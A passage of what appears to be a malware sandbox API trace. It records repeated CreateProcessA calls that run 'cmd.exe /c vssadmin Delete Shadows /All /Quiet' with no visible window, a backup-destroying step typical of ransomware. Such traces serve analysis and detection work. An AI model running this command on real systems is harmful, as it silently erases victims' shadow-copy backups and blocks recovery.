dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.382] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.382] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.382] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.382] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.383] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.383] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.383] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.383] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.383] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.383] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.383] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.383] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.383] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.383] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.383] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.383] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.383] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.383] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.383] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.383] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.384] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.384] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.384] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.384] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.384] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.384] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.384] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.384] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.384] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.384] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.384] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.384] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.384] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.384] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.384] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.384] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.385] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.385] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.385] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.385] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.385] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.385] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.385] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.385] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.385] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.385] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.385] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.385] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.385] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.385] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.385] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.385] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.386] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.386] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.386] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: _Dst=0x205fe78) returned 0x205fe78 [0077.386] CreateProcessA (in: lpApplicationName="cmd.exe", lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x205fc38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x205fbc0 | out: lpCommandLine="/c vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x205fbc0*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0077.386] memcpy (in: _Dst=0x205fe78, _Src=0x205fb0f, _Size=0x27 | out: 